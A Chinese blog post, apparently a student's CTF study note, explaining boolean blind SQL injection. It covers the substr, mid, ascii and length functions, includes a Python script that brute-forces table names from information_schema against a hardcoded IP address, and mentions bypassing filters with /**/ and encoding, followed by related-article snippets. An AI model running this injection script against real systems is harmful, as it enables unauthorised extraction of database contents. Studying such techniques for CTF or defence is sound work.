浅谈盲注

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量607 收藏
点赞数
分类专栏: 题目 文章标签: sql 盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/91042471
版权

终于上完课了开心,明天就放假
!!!!!!
好的就用中午来谈一下盲注
盲注如大多数注入一样doushiliyong管理员开发是的问题
但盲注大多都不会回显所以大多都是使用脚本跑恩恩

所以我们先要爆表明大多数会用到函数
substr()函数是一个截断函数
string substring(string, start, length)
length是返回字符串的长度
比如:
substr(DATABASE(),2,1)数据库的第二个字符后面可以判断段是否等于
(可以用暴力,用二分法~~~~~~~~)

**函数mid()**也是用来返回字符串的
mid(striing,start,length)
作用和上面那个差不

ascii函数
返回字符串str的最左字符的数值。返回0,如果str为空字符串。返回NULL,如果str为NULL。 ASCII()返回数值是从0到255;

length函数
是用来返回长度可以猜数据库名表明.

import requests
table=''
url="http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s)and'1"


for i in range(1,50):
	for j in range(32,126):
		payload = url%(str(i),str(j))
		s = requests.get(payload)
		if 'Hello' in s.text:
			table += chr(j)
			print table
			break

```自己尝试一下
还有可能会过滤字符
所以我们要用其他一些来绕过
空格的绕过是/**/,编码,()等
**以上都是我队友大佬教我的
他是真的强**
doudoudedi
关注
专栏目录
SQL注入之盲注(布尔盲注
Marsper的博客
09-23 903
SQL注入之盲注 SQL注入之布尔注入 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。 布尔型:页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据 首先我们还是以sqli-labs为载体,第lesson 8。 输入 ?id='1' and 1= 2 -- 页面显示错误,可进行盲注 首先认识几个函数: length()函数:返回字符串的长度 subst
盲注
weixin_53026460的博客
10-24 3194
盲注属于SQL注入的一种,SQL注入可以通过不同的类别来分类,比如按照传参方式分类SQL注入:GET、POST、HEAD(COOKIE),根据做法的不同,我们也可以把这些分类为盲注、报错注入和显错注入;盲注是什么?(一)布尔盲注布尔是一种类型,核心是在于判断正确与否。布尔就是指这个页面有回显,但是不会显示具体内容,只会显示语句是否正常执行;举个例子,这是一条存在sql注入的语句;在这里输入and 1=1;会发现页面显示有数据;将and 1=1修改为and 1=1;
sql注入之盲注
最新发布
weixin_64815500的博客
06-19 1077
sql注入关于无回显用到的盲注sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
SQL注入——布尔盲注,时间盲注,宽字节注入
18年3月萌新白帽子
06-11 5549
布尔盲注1.布尔盲注利用前提页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在注入缺点:速度太慢,消耗大量时间布尔盲注思维导图:布尔盲注常用语句:substr(string,num start,num length)string 为字符串string 为字符串length 为长度ascii( )函数作用:返回字符串str的字符ASCII码值。如果str是空字符...
05-浅谈企业SQL注入漏洞的危害与防御1
08-03
1. **按利用方式**:盲注、报错注入、time盲注、union注入、内联查询注入、拼接(堆)查询注入。 2. **按攻击入口**:GET型、POST型、Cookie型、Header型SQL注入。 3. **按注入点类型**:整型注入、字符型注入等。 ...
SQL注入攻击及其防范浅谈
03-01
2. 基于时间的盲注:攻击者通过观察查询的执行时间来判断条件是否成立。 3. 基于布尔的盲注:通过判断查询结果是否存在来确定条件。 4. 联合查询注入:在多表联查中注入,获取额外的信息。 5.堆叠查询注入:通过在...
浅谈LDAP注入的攻击与防御
世间繁华梦一出
05-29 3128
LDAPLDAP简介LDAP注入攻击web应用中的LDAP注入AND注入OR注入盲注入LDAP注入的防御 LDAP简介 1、定义:LDAP是一个轻量级目录访问协议,是一种在线目录访问协议,主要用于目录中资源的搜索和查询。 2、特性:LDAP不定义客户端和服务端的工作方式,但会定义客户端和服务端的通信方式。此外,LDAP还会定义LDAP数据库的访问权限及服务端数据的格式和属性。 部署了LDAP的应用不会直接访问目录中的内容,一般通过函数调用或者API,应用可以通过定义的C、JAVA的API进行访问。Java应
浅谈IP地址和网络安全
m0_70402478的博客
06-11 999
今天学了一下关于IP地址的一些东西,发现IP地址虽然只有简简单单的几串数字组合而成,然而实际上却有很深的玄机。本人也想成为一名网络安全的小白,然后我发奋看视频,看书,也渐渐了解了网络安全这一大框,大多的网络安全渗透的原理也略知一二。比如sql注入,利用精心构造出来的sql语句,从而获取到你想要的数据库信息,我们一般可以使用一些漏洞扫描工具或者sql注入脚本比如sqlmap进行快速的注入,但是太没有意思了,而且效果也不是很好。所以我们要深入学习手工注入,一般的手工注入有回显注入,就是你输入sql语句它会给你明
实战渗透浅谈-记一次应急渗透测试
qq_29437513的博客
12-24 3879
实战渗透浅谈-记一次应急渗透测试
盲注
熊俊坤的博客
10-27 643
盲注
6、盲注(bool)
weixin_51520483的博客
05-18 611
1、注意在页面不报错的情况下,如何获取bool返回值,多学习其他的获取语法。
SQL注入】盲注
4ut15m's blog
02-03 622
其他相关文章: SQL注入基础 报错注入 盲注 用于页面注入无回显并且不会打印错误信息的情况. 盲注类型 布尔型盲注,延时盲注 布尔型盲注 注入页面虽然无回显,但是根据注入造成的不同布尔值(true与false)页面会有不同的结果这便是布尔型盲注. if函数:if(condition, value_if_true, value_if_false),condition为判断条件,参...
盲注--理论知识
adaosanqian的博客
02-28 3745
关于布尔盲注和时间盲注的基础知识讲解
SQL注入之盲注
qq_45691294的博客
07-12 670
盲注 盲注也可以叫做布尔型注入,主要使用在存在SQL注入漏洞但是不能直接查询爆出内容的地方,主要依靠逻辑的真假来实现爆出数据,盲注的效率相对较低。 盲注主要分为普通型盲注和时间盲注(延时注入),普通型注入主要看逻辑真假返回时页面的不同进行判断,而延时注入用于页面没有任何数据返回且逻辑不管真假前端页面也无不同的请况下。 在联合注入中我们就给出了有关字符串的一些函数,在盲注中也需要使用到这些函数。 length() # 返回字符串的长度 substring() substr()
sql注入(盲注
2302_79119987的博客
04-23 2091
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
SQL注入---盲注
zhoutong2323的博客
04-05 725
注是一种SQL注入攻击的形式,在这种攻击中,攻击者向目标应用程序发送恶意注入代码,然后通过观察应用程序的响应来推断出数据库中的信息。与常规的SQL注入攻击不同的是,盲注攻击是页面不会将报错信息回显以及没有明显回显位的情况下,页面不直接返回任何有关数据库的具体错误信息,导致攻击者无法直接获得数据库中的数据。盲注可以分为基于布尔逻辑的盲注和基于时间的盲注两种形式。基于布尔逻辑的盲注:攻击者通过在恶意注入代码中利用布尔逻辑运算符(如AND、OR)来判断条件是否为真,从而推断出数据库中的信息。例如,攻击者可以通过尝
浅谈linuxptp
09-23
Linuxptp是一个用于在Linux系统上实现精确时间同步的软件。它是一个遵循PTP(协议)的守护进程,可用于在计算机网络中同步时钟。它使用PTP协议(即IEEE 1588)来实现高精度的时间同步,以纳秒级别的精确度进行时钟...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值